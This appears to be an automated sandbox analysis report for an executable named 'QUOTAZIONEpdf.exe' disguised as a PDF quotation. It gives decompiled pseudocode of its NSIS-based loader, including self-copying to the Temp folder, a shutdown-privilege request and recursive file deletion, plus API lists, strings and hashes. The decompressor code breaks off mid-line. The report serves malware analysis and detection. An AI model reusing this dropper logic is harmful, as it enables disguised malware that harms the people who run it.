SetCurrentDirectoryA 3467->3468 3470 405626 3469->3470 3474 405632 3469->3474 3471 40562d CharNextA 3470->3471 3470->3474 3472 40564f 
3471->3472 3472->3463 3473 4055a3 CharNextA 3473->3474 3474->3472 3474->3473 3475->3467 3476 401734 3477 4029e8 18 API calls 3476->3477 3478 40173b 3477->3478 3479 401761 3478->3479 3480 401759 3478->3480 3531 405a85 lstrcpynA 3479->3531 3530 405a85 lstrcpynA 3480->3530 3483 40175f 3487 405ce3 5 API calls 3483->3487 3484 40176c 3532 405578 lstrlenA CharPrevA 3484->3532 3507 40177e 3487->3507 3491 401795 CompareFileTime 3491->3507 3492 401859 3494 404e23 25 API calls 3492->3494 3493 401830 3495 404e23 25 API calls 3493->3495 3503 401845 3493->3503 3497 401863 3494->3497 3495->3503 3496 405a85 lstrcpynA 3496->3507 3515 402f01 3497->3515 3500 40188a SetFileTime 3501 40189c FindCloseChangeNotification 3500->3501 3501->3503 3504 4018ad 3501->3504 3502 405aa7 18 API calls 3502->3507 3505 4018b2 3504->3505 3506 4018c5 3504->3506 3508 405aa7 18 API calls 3505->3508 3509 405aa7 18 API calls 3506->3509 3507->3491 3507->3492 3507->3493 3507->3496 3507->3502 3514 40575c GetFileAttributesA CreateFileA 3507->3514 3535 405d7c FindFirstFileA 3507->3535 3538 40573d GetFileAttributesA 3507->3538 3541 405346 3507->3541 3511 4018ba lstrcatA 3508->3511 3512 4018cd 3509->3512 3511->3512 3513 405346 MessageBoxIndirectA 3512->3513 3513->3503 3514->3507 3516 402f12 SetFilePointer 3515->3516 3517 402f2e 3515->3517 3516->3517 3545 40302c GetTickCount 3517->3545 3520 402f3f ReadFile 3521 402f5f 3520->3521 3526 401876 3520->3526 3522 40302c 42 API calls 3521->3522 3521->3526 3523 402f76 3522->3523 3524 402ff1 ReadFile 3523->3524 3523->3526 3528 402f86 3523->3528 3524->3526 3526->3500 3526->3501 3527 402fa1 ReadFile 3527->3526 3527->3528 3528->3526 3528->3527 3529 402fba WriteFile 3528->3529 3529->3526 3529->3528 3530->3483 3531->3484 3533 405592 lstrcatA 3532->3533 3534 401772 lstrcatA 3532->3534 3533->3534 3534->3483 3536 405d92 FindClose 3535->3536 3537 405d9d 3535->3537 3536->3537 3537->3507 3539 405759 3538->3539 3540 40574c SetFileAttributesA 3538->3540 3539->3507 3540->3539 3542 40535b 
3541->3542 3543 4053a7 3542->3543 3544 40536f MessageBoxIndirectA 3542->3544 3543->3507 3544->3543 3546 403196 3545->3546 3547 40305b 3545->3547 3549 402bc5 32 API calls 3546->3549 3558 4031da SetFilePointer 3547->3558 3554 402f37 3549->3554 3550 403066 SetFilePointer 3555 40308b 3550->3555 3554->3520 3554->3526 3555->3554 3556 403120 WriteFile 3555->3556 3557 403177 SetFilePointer 3555->3557 3559 4031a8 ReadFile 3555->3559 3561 405e9d 3555->3561 3568 402bc5 3555->3568 3556->3554 3556->3555 3557->3546 3558->3550 3560 4031c9 3559->3560 3560->3555 3562 405ec2 3561->3562 3563 405eca 3561->3563 3562->3555 3563->3562 3564 405f51 GlobalFree 3563->3564 3565 405f5a GlobalAlloc 3563->3565 3566 405fd1 GlobalAlloc 3563->3566 3567 405fc8 GlobalFree 3563->3567 3564->3565 3565->3562 3565->3563 3566->3562 3566->3563 3567->3566 3569 402bd3 3568->3569 3570 402beb 3568->3570 3571 402be3 3569->3571 3572 402bdc DestroyWindow 3569->3572 3573 402bf3 3570->3573 3574 402bfb GetTickCount 3570->3574 3571->3555 3572->3571 3583 405ddc 3573->3583 3574->3571 3576 402c09 3574->3576 3577 402c11 3576->3577 3578 402c3e CreateDialogParamA 3576->3578 3577->3571 3587 402ba9 3577->3587 3578->3571 3580 402c1f wsprintfA 3581 404e23 25 API calls 3580->3581 3582 402c3c 3581->3582 3582->3571 3584 405df9 PeekMessageA 3583->3584 3585 405e09 3584->3585 3586 405def DispatchMessageA 3584->3586 3585->3571 3586->3584 3588 402bb8 3587->3588 3589 402bba MulDiv 3587->3589 3588->3589 3589->3580 4859 401634 4860 4029e8 18 API calls 4859->4860 4861 40163a 4860->4861 4862 405d7c 2 API calls 4861->4862 4863 401640 4862->4863 4864 401934 4865 4029cb 18 API calls 4864->4865 4866 40193b 4865->4866 4867 4029cb 18 API calls 4866->4867 4868 401945 4867->4868 4869 4029e8 18 API calls 4868->4869 4870 40194e 4869->4870 4871 401961 lstrlenA 4870->4871 4873 40199c 4870->4873 4872 40196b 4871->4872 4872->4873 4877 405a85 lstrcpynA 4872->4877 4875 401985 4875->4873 4876 401992 lstrlenA 4875->4876 4876->4873 4877->4875 4878 4019b5 4879 
4029e8 18 API calls 4878->4879 4880 4019bc 4879->4880 4881 4029e8 18 API calls 4880->4881 4882 4019c5 4881->4882 4883 4019cc lstrcmpiA 4882->4883 4884 4019de lstrcmpA 4882->4884 4885 4019d2 4883->4885 4884->4885 4886 4014b7 4887 4014bd 4886->4887 4888 401389 2 API calls 4887->4888 4889 4014c5 4888->4889 4890 4025be 4891 4025c5 4890->4891 4893 40282a 4890->4893 4892 4029cb 18 API calls 4891->4892 4894 4025d0 4892->4894 4895 4025d7 SetFilePointer 4894->4895 4895->4893 4896 4025e7 4895->4896 4898 4059e3 wsprintfA 4896->4898 4898->4893 4899 40673f 4902 405ed0 4899->4902 4900 405f51 GlobalFree 4901 405f5a GlobalAlloc 4900->4901 4901->4902 4903 40683b 4901->4903 4902->4900 4902->4901 4902->4902 4902->4903 4904 405fd1 GlobalAlloc 4902->4904 4905 405fc8 GlobalFree 4902->4905 4904->4902 4904->4903 4905->4904

                Executed Functions

                C-Code - Quality: 82%
                			_entry_() {
                				struct _SHFILEINFOA _v360;
                				struct _SECURITY_ATTRIBUTES* _v376;
                				char _v380;
                				CHAR* _v384;
                				char _v396;
                				int _v400;
                				int _v404;
                				CHAR* _v408;
                				intOrPtr _v412;
                				int _v416;
                				intOrPtr _v420;
                				struct _SECURITY_ATTRIBUTES* _v424;
                				void* _v432;
                				int _t34;
                				CHAR* _t39;
                				char* _t42;
                				signed int _t44;
                				void* _t48;
                				intOrPtr _t50;
                				signed int _t52;
                				signed int _t55;
                				int _t56;
                				signed int _t60;
                				void* _t79;
                				void* _t89;
                				void* _t91;
                				char* _t96;
                				signed int _t97;
                				void* _t98;
                				signed int _t99;
                				signed int _t100;
                				signed int _t103;
                				CHAR* _t105;
                				signed int _t106;
                				char _t120;
                
                				_v376 = 0;
                				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
                				_t99 = 0;
                				_v380 = 0x20;
                				__imp__#17();
                				_t34 = SetErrorMode(0x8001); // executed
                				__imp__OleInitialize(0); // executed
                				 *0x423f58 = _t34;
                				 *0x423ea4 = E00405DA3(8);
                				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
                				E00405A85(0x4236a0, "NSIS Error");
                				_t39 = GetCommandLineA();
                				_t96 = "\"C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe\" ";
                				E00405A85(_t96, _t39);
                				 *0x423ea0 = GetModuleHandleA(0);
                				_t42 = _t96;
                				if("\"C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe\" " == 0x22) {
                					_v404 = 0x22;
                					_t42 =  &M00429001;
                				}
                				_t44 = CharNextA(E004055A3(_t42, _v404));
                				_v404 = _t44;
                				while(1) {
                					_t91 =  *_t44;
                					_t109 = _t91;
                					if(_t91 == 0) {
                						break;
                					}
                					__eflags = _t91 - 0x20;
                					if(_t91 != 0x20) {
                						L5:
                						__eflags =  *_t44 - 0x22;
                						_v404 = 0x20;
                						if( *_t44 == 0x22) {
                							_t44 = _t44 + 1;
                							__eflags = _t44;
                							_v404 = 0x22;
                						}
                						__eflags =  *_t44 - 0x2f;
                						if( *_t44 != 0x2f) {
                							L15:
                							_t44 = E004055A3(_t44, _v404);
                							__eflags =  *_t44 - 0x22;
                							if(__eflags == 0) {
                								_t44 = _t44 + 1;
                								__eflags = _t44;
                							}
                							continue;
                						} else {
                							_t44 = _t44 + 1;
                							__eflags =  *_t44 - 0x53;
                							if( *_t44 == 0x53) {
                								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
                								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
                									_t99 = _t99 | 0x00000002;
                									__eflags = _t99;
                								}
                							}
                							__eflags =  *_t44 - 0x4352434e;
                							if( *_t44 == 0x4352434e) {
                								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
                								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
                									_t99 = _t99 | 0x00000004;
                									__eflags = _t99;
                								}
                							}
                							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
                							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
                								 *((intOrPtr*)(_t44 - 2)) = 0;
                								__eflags = _t44 + 2;
                								E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t44 + 2);
                								L20:
                								_t105 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
                								GetTempPathA(0x400, _t105);
                								_t48 = E004031F1(_t109);
                								_t110 = _t48;
                								if(_t48 != 0) {
                									L22:
                									DeleteFileA("1033"); // executed
                									_t50 = E00402C5B(_t111, _t99); // executed
                									_v412 = _t50;
                									if(_t50 != 0) {
                										L32:
                										E004035A6();
                										__imp__OleUninitialize();
                										if(_v408 == 0) {
                											__eflags =  *0x423f34;
                											if( *0x423f34 != 0) {
                												_t106 = E00405DA3(3);
                												_t100 = E00405DA3(4);
                												_t55 = E00405DA3(5);
                												__eflags = _t106;
                												_t97 = _t55;
                												if(_t106 != 0) {
                													__eflags = _t100;
                													if(_t100 != 0) {
                														__eflags = _t97;
                														if(_t97 != 0) {
                															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
                															__eflags = _t60;
                															if(_t60 != 0) {
                																 *_t100(0, "SeShutdownPrivilege",  &_v400);
                																_v416 = 1;
                																_v404 = 2;
                																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
                															}
                														}
                													}
                												}
                												_t56 = ExitWindowsEx(2, 0);
                												__eflags = _t56;
                												if(_t56 == 0) {
                													E0040140B(9);
                												}
                											}
                											_t52 =  *0x423f4c;
                											__eflags = _t52 - 0xffffffff;
                											if(_t52 != 0xffffffff) {
                												_v400 = _t52;
                											}
                											ExitProcess(_v400);
                										}
                										E00405346(_v408, 0x200010);
                										ExitProcess(2);
                									}
                									if( *0x423ebc == 0) {
                										L31:
                										 *0x423f4c =  *0x423f4c | 0xffffffff;
                										_v400 = E004035E3();
                										goto L32;
                									}
                									_t103 = E004055A3(_t96, 0);
                									while(_t103 >= _t96) {
                										__eflags =  *_t103 - 0x3d3f5f20;
                										if(__eflags == 0) {
                											break;
                										}
                										_t103 = _t103 - 1;
                										__eflags = _t103;
                									}
                									_t115 = _t103 - _t96;
                									_v408 = "Error launching installer";
                									if(_t103 < _t96) {
                										lstrcatA(_t105, "~nsu.tmp");
                										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\Desktop") == 0) {
                											goto L32;
                										}
                										CreateDirectoryA(_t105, 0);
                										SetCurrentDirectoryA(_t105);
                										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
                										if(_t120 == 0) {
                											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", "C:\\Users\\hardz\\Desktop");
                										}
                										E00405A85(0x424000, _v396);
                										 *0x424400 = 0x41;
                										_t98 = 0x1a;
                										do {
                											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x120)));
                											DeleteFileA(0x41f050);
                											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\Desktop\\QUOTAZIONEpdf.exe", 0x41f050, 1) != 0) {
                												_push(0);
                												_push(0x41f050);
                												E004057D3();
                												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)( *0x423eb0 + 0x124)));
                												_t79 = E004052E5(0x41f050);
                												if(_t79 != 0) {
                													CloseHandle(_t79);
                													_v416 = 0;
                												}
                											}
                											 *0x424400 =  *0x424400 + 1;
                											_t98 = _t98 - 1;
                										} while (_t98 != 0);
                										_push(0);
                										_push(_t105);
                										E004057D3();
                										goto L32;
                									}
                									 *_t103 = 0;
                									_t104 = _t103 + 4;
                									if(E00405659(_t115, _t103 + 4) == 0) {
                										goto L32;
                									}
                									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
                									_v424 = 0;
                									goto L31;
                								}
                								GetWindowsDirectoryA(_t105, 0x3fb);
                								lstrcatA(_t105, "\\Temp");
                								_t89 = E004031F1(_t110);
                								_t111 = _t89;
                								if(_t89 == 0) {
                									goto L32;
                								}
                								goto L22;
                							}
                							goto L15;
                						}
                					} else {
                						goto L4;
                					}
                					do {
                						L4:
                						_t44 = _t44 + 1;
                						__eflags =  *_t44 - 0x20;
                					} while ( *_t44 == 0x20);
                					goto L5;
                				}
                				goto L20;
                			}

                APIs
                • #17.COMCTL32 ref: 00403244
                • SetErrorMode.KERNELBASE(00008001), ref: 0040324F
                • OleInitialize.OLE32(00000000), ref: 00403256
                  • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                  • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                  • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                • SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E
                  • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 00403293
                • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000), ref: 004032A6
                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000020), ref: 004032D1
                • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
                • DeleteFileA.KERNELBASE(1033), ref: 00403398
                • OleUninitialize.OLE32(00000000), ref: 00403416
                • ExitProcess.KERNEL32 ref: 00403436
                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,00000000), ref: 00403442
                • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,00000000,00000000), ref: 0040344E
                • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
                • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
                • DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
                • CopyFileA.KERNEL32(C:\Users\user\Desktop\QUOTAZIONEpdf.exe,0041F050,00000001), ref: 004034BF
                • CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
                • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
                • ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
                • ExitProcess.KERNEL32 ref: 004035A0
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\QUOTAZIONEpdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                • API String ID: 2278157092-678278877
                • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (image not preserved; nodes were marked as executed or not executed)
                C-Code - Quality: 94%
                			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                				signed int _v8;
                				signed int _v12;
                				struct _WIN32_FIND_DATAA _v332;
                				signed int _t37;
                				char* _t49;
                				signed int _t52;
                				signed int _t55;
                				signed int _t61;
                				signed int _t63;
                				void* _t65;
                				signed int _t68;
                				CHAR* _t70;
                				CHAR* _t72;
                				char* _t75;
                
                				_t72 = _a4;
                				_t37 = E00405659(__eflags, _t72);
                				_v12 = _t37;
                				if((_a8 & 0x00000008) != 0) {
                					_t63 = DeleteFileA(_t72); // executed
                					asm("sbb eax, eax");
                					_t65 =  ~_t63 + 1;
                					 *0x423f28 =  *0x423f28 + _t65;
                					return _t65;
                				}
                				_t68 = _a8 & 0x00000001;
                				__eflags = _t68;
                				_v8 = _t68;
                				if(_t68 == 0) {
                					L5:
                					E00405A85(0x4214a0, _t72);
                					__eflags = _t68;
                					if(_t68 == 0) {
                						E004055BF(_t72);
                					} else {
                						lstrcatA(0x4214a0, "\*.*");
                					}
                					__eflags =  *_t72;
                					if( *_t72 != 0) {
                						L10:
                						lstrcatA(_t72, 0x40900c);
                						L11:
                						_t70 =  &(_t72[lstrlenA(_t72)]);
                						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                						__eflags = _t37 - 0xffffffff;
                						_a4 = _t37;
                						if(_t37 == 0xffffffff) {
                							L29:
                							__eflags = _v8;
                							if(_v8 != 0) {
                								_t31 = _t70 - 1;
                								 *_t31 =  *(_t70 - 1) & 0x00000000;
                								__eflags =  *_t31;
                							}
                							goto L31;
                						} else {
                							goto L12;
                						}
                						do {
                							L12:
                							_t75 =  &(_v332.cFileName);
                							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                							__eflags =  *_t49;
                							if( *_t49 != 0) {
                								__eflags = _v332.cAlternateFileName;
                								if(_v332.cAlternateFileName != 0) {
                									_t75 =  &(_v332.cAlternateFileName);
                								}
                							}
                							__eflags =  *_t75 - 0x2e;
                							if( *_t75 != 0x2e) {
                								L19:
                								E00405A85(_t70, _t75);
                								__eflags = _v332.dwFileAttributes & 0x00000010;
                								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                									E0040573D(_t72);
                									_t52 = DeleteFileA(_t72);
                									__eflags = _t52;
                									if(_t52 != 0) {
                										E00404E23(0xfffffff2, _t72);
                									} else {
                										__eflags = _a8 & 0x00000004;
                										if((_a8 & 0x00000004) == 0) {
                											 *0x423f28 =  *0x423f28 + 1;
                										} else {
                											E00404E23(0xfffffff1, _t72);
                											_push(0);
                											_push(_t72);
                											E004057D3();
                										}
                									}
                								} else {
                									__eflags = (_a8 & 0x00000003) - 3;
                									if(__eflags == 0) {
                										E004053AA(_t70, __eflags, _t72, _a8);
                									}
                								}
                								goto L27;
                							}
                							_t61 =  *((intOrPtr*)(_t75 + 1));
                							__eflags = _t61;
                							if(_t61 == 0) {
                								goto L27;
                							}
                							__eflags = _t61 - 0x2e;
                							if(_t61 != 0x2e) {
                								goto L19;
                							}
                							__eflags =  *((char*)(_t75 + 2));
                							if( *((char*)(_t75 + 2)) == 0) {
                								goto L27;
                							}
                							goto L19;
                							L27:
                							_t55 = FindNextFileA(_a4,  &_v332);
                							__eflags = _t55;
                						} while (_t55 != 0);
                						_t37 = FindClose(_a4);
                						goto L29;
                					}
                					__eflags =  *0x4214a0 - 0x5c;
                					if( *0x4214a0 != 0x5c) {
                						goto L11;
                					}
                					goto L10;
                				} else {
                					__eflags = _t37;
                					if(_t37 == 0) {
                						L31:
                						__eflags = _v8;
                						if(_v8 == 0) {
                							L39:
                							return _t37;
                						}
                						__eflags = _v12;
                						if(_v12 != 0) {
                							_t37 = E00405D7C(_t72);
                							__eflags = _t37;
                							if(_t37 == 0) {
                								goto L39;
                							}
                							E00405578(_t72);
                							E0040573D(_t72);
                							_t37 = RemoveDirectoryA(_t72);
                							__eflags = _t37;
                							if(_t37 != 0) {
                								return E00404E23(0xffffffe5, _t72);
                							}
                							__eflags = _a8 & 0x00000004;
                							if((_a8 & 0x00000004) == 0) {
                								goto L33;
                							}
                							E00404E23(0xfffffff1, _t72);
                							_push(0);
                							_push(_t72);
                							return E004057D3();
                						}
                						L33:
                						 *0x423f28 =  *0x423f28 + 1;
                						return _t37;
                					}
                					__eflags = _a8 & 0x00000002;
                					if((_a8 & 0x00000002) == 0) {
                						goto L31;
                					}
                					goto L5;
                				}
                			}


















                APIs
                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 004053C8
                • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405412
                • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405433
                • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405439
                • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 0040544A
                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                • FindClose.KERNEL32(?), ref: 0040550D
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                • \*.*, xrefs: 0040540C
                • "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" , xrefs: 004053B4
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-4182517818
                • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph (image not preserved; nodes were marked as executed or not executed)
                C-Code - Quality: 98%
                			E0040604C() {
                				unsigned short _t531;
                				signed int _t532;
                				void _t533;
                				void* _t534;
                				signed int _t535;
                				signed int _t565;
                				signed int _t568;
                				signed int _t590;
                				signed int* _t607;
                				void* _t614;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t614 - 0x40) != 0) {
                						 *(_t614 - 0x34) = 1;
                						 *(_t614 - 0x84) = 7;
                						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                						L132:
                						 *(_t614 - 0x54) = _t607;
                						L133:
                						_t531 =  *_t607;
                						_t590 = _t531 & 0x0000ffff;
                						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                						if( *(_t614 - 0xc) >= _t565) {
                							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                							 *(_t614 - 0x40) = 1;
                							_t532 = _t531 - (_t531 >> 5);
                							 *_t607 = _t532;
                						} else {
                							 *(_t614 - 0x10) = _t565;
                							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                						}
                						if( *(_t614 - 0x10) >= 0x1000000) {
                							L139:
                							_t533 =  *(_t614 - 0x84);
                							L140:
                							 *(_t614 - 0x88) = _t533;
                							goto L1;
                						} else {
                							L137:
                							if( *(_t614 - 0x6c) == 0) {
                								 *(_t614 - 0x88) = 5;
                								goto L170;
                							}
                							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                							goto L139;
                						}
                					} else {
                						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                						__esi =  *(__ebp - 0x60);
                						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                						__ecx =  *(__ebp - 0x3c);
                						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                						__ecx =  *(__ebp - 4);
                						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                						if( *(__ebp - 0x38) >= 4) {
                							if( *(__ebp - 0x38) >= 0xa) {
                								_t97 = __ebp - 0x38;
                								 *_t97 =  *(__ebp - 0x38) - 6;
                							} else {
                								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                							}
                						} else {
                							 *(__ebp - 0x38) = 0;
                						}
                						if( *(__ebp - 0x34) == __edx) {
                							__ebx = 0;
                							__ebx = 1;
                							L60:
                							__eax =  *(__ebp - 0x58);
                							__edx = __ebx + __ebx;
                							__ecx =  *(__ebp - 0x10);
                							__esi = __edx + __eax;
                							__ecx =  *(__ebp - 0x10) >> 0xb;
                							__ax =  *__esi;
                							 *(__ebp - 0x54) = __esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                							if( *(__ebp - 0xc) >= __ecx) {
                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                								__cx = __ax;
                								_t216 = __edx + 1; // 0x1
                								__ebx = _t216;
                								__cx = __ax >> 5;
                								 *__esi = __ax;
                							} else {
                								 *(__ebp - 0x10) = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
